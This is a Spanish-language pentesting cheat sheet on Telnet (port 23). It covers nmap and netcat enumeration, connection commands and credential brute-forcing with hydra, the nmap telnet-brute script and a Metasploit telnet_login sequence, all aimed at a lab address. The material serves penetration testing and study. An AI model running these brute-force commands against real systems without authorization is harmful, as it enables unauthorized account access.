⚪ 23 - Telnet (TCP)
Información
Telnet es un protocolo de aplicación cliente/servidor que proporciona acceso a terminales en sistemas locales/remotos.
Puerto Estándar: 23
PORT STATE SERVICE
23/tcp open telnet
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
PORT STATE SERVICE VERSION
23/tcp open telnet Netkit telnet-ssl telnetd
Si Nmap no obtiene el encabezado del servicio, consultará la DB IANA para determinar el servicio asociado al puerto.
Enumeración
nc -vn 192.168.1.2 23
timeout 0.1 bash -c "nc -nv 192.168.1.2 23"
nmap -p23 -sS 192.168.1.2
nmap -p23 -sVC 192.168.1.2
nmap -p23 --script="telnet-encryption" 192.168.1.2
nmap -p23 --script="telnet-ntlm-info" 192.168.1.2
Conectar
# default port (23)
telnet 192.168.1.2
# other port
telnet 192.168.1.2 1234
Brute Force
Telnet es un protocolo excesivamente lento, descartar el uso de hilos “threads” en los ataques.
Password
Si dispone de un usuario y quiere obtener el password:
hydra -t 1 -l user -P rockyou.txt telnet://192.168.1.2 -V -F -I
nmap -p23 --script="telnet-brute" --script-args="user=john,passdb=rockyou.txt,telnet-brute.timeout=8s" 192.168.1.2
msf6 > use auxiliary/scanner/telnet/telnet_login
msf6 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.1.2
msf6 auxiliary(scanner/telnet/telnet_login) > set USERNAME peter
msf6 auxiliary(scanner/telnet/telnet_login) > set PASS_FILE rockyou.txt
msf6 auxiliary(scanner/telnet/telnet_login) > set THREADS 1
msf6 auxiliary(scanner/telnet/telnet_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/telnet/telnet_login) > run
User
Si dispone de un password y quiere obtener el usuario:
hydra -t 1 -L users.dic -p P@ssword1 telnet://192.168.1.2 -V -F -I
Archivos Asociados
/etc/inetd.conf/etc/xinetd.d/telnet/etc/xinetd.d/stelnet
© d4t4s3c 2023-2025